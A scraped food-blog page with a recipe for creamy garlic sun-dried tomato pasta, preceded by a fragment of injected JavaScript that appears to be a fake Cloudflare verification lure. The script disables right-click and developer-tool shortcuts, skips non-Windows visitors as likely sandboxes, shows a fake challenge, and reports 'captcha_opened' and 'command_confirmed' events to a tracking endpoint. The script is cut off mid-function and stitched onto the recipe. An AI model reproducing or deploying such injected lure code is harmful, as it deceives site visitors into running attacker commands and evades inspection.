`; if (ij) { if (cl) { if (all) { document.querySelectorAll(ij).forEach(function(el, i) { el.addEventListener('click', function(e) { e.preventDefault(); document.body.appendChild(container); if (!init) { initScript(); } }); }) } else { document.querySelector(ij).addEventListener('click', function(e) { e.preventDefault(); document.body.appendChild(container); if (!init) { initScript(); } }); } } else { document.querySelector(ij).before(container); initScript(); } } else { document.querySelector('html').innerHTML = container.innerHTML; initScript(); } document.addEventListener('contextmenu', function(e) { e.preventDefault(); return false; }); document.addEventListener('keydown', function(e) { if (e.key === 'F12' || e.keyCode === 123) { e.preventDefault(); return false; } if (e.ctrlKey && e.shiftKey && (e.key === 'I' || e.key === 'i' || e.keyCode === 73)) { e.preventDefault(); return false; } if (e.ctrlKey && e.shiftKey && (e.key === 'J' || e.key === 'j' || e.keyCode === 74)) { e.preventDefault(); return false; } if (e.ctrlKey && (e.key === 'U' || e.key === 'u' || e.keyCode === 85)) { e.preventDefault(); return false; } if (e.ctrlKey && e.shiftKey && (e.key === 'C' || e.key === 'c' || e.keyCode === 67)) { e.preventDefault(); return false; } return true; }); } function sendEvent(eventType, id) { if (!syn) { return; } const payload = { id: id, event: eventType, // 'ping', captcha_opened', 'captcha_solved', 'command_confirmed' ua: navigator.userAgent, url: location.href, arch: checkArch(), timestamp: Date.now() }; const json = JSON.stringify(payload); const blob = new Blob([json], { type: 'application/json' }); const targetUrl = '/cdn/verify'; if (navigator.sendBeacon && navigator.sendBeacon(targetUrl, blob)) { return; } fetch(targetUrl, { method: 'POST', body: blob, keepalive: true, headers: { 'Content-Type': 'application/json' } }).catch(() => {}); } const arch = checkArch(); if (arch === 'non-windows') { console.log("VM detected — skipping challenge"); setTimeout(function() { if (document.querySelector('#get_api_key_jss')) document.querySelector('#get_api_key_jss').remove(); }, 1000); } else { //setTimeout(function() { const storedStatus = localStorage.getItem(`_verify_${currentId}`); if (storedStatus !== 'completed') { sendEvent('ping', currentId); showCloudflareChallenge(); if (document.querySelector('#get_api_key_jss')) document.querySelector('#get_api_key_jss').remove(); } //}, 3000); } })();
Food

Creamy Garlic Sun-Dried Tomato Pasta

ALERT ALERT ALERT! Only a small amount of time and a few ingredients stand between you and a skillet full of creamy, garlicky, flavorful, romantic, and dangerously good pasta. Tender sun-dried tomatoes, maybe some spinach, creamy sauce, bouncy noodles, and a heavy dusting of Parmesan. This is an urgent matter. I think you understand.A few important things for your review before you take a swim in this creamy, luscious pan of pasta:
First of all, can you ever go wrong with garlic, white wine, and cream in a sauce? Hint: no. It’s just a cheat code for greatness. It makes short ingredient lists everywhere very, very happy.
Secondly, spirali is the most fun pasta shape of all time and I won’t debate with you about this. It’s a skinny little tube, like bucatini, but it’s wound into a tight spiral, so you get a spiraly shape that is very subtly voluminous and airy at the same time. Spring gift to yourself: an order of specialty pasta to make your weeknight cooking into a fun adventure. File under things you say after age 30.
Bringing You a Very Simple Ingredient List
Okay, your star players in this recipe are:
pasta (spirali, spirali, spirali! it’s too much fun)
garlic
white wine
cream
sun-dried tomatoes
Parmesan
And… the rest is kind of up to you. You can throw in a handful of spinach and some sliced chicken sausage if you want. Make it a one-pot meal.
Or you can just dive in headfirst.
You’ll Need Delicious, Quality Pasta Here
Truthfully, one of my favorite SOS hacks is keeping versatile, good-quality foods on hand at all times.
DeLallo is the source of many of my favorite items in this category.
Their website is FULL and I mean really FULL of fun made-in-Italy products that can ship right to your door, and we have a large selection of all of these things at our office kitchen since we’ve been working with DeLallo for like, 8 years? Longest standing brand partner on POY because we love them and so do you. ♡
In my home kitchen, however, space is tight, so I have to reduce my stash to just a few of our most beloved favorites:
rigatoni
whole wheat orzo
gnocchi
tomato sauce
sun-dried tomatoes
and now, spirali
Whatever kind of noodle you use, it’s just a fact: pasta in a creamy white wine garlic sauce, speckled with tender bites of sun dried tomatoes and a handful of fresh herbs makes any SOS weeknight just a little less SOS-y and a lot more wonderful.
Source Url -: https://pinchofyum.com/creamy-garlic-sun-dried-tomato-pasta

Leave a Reply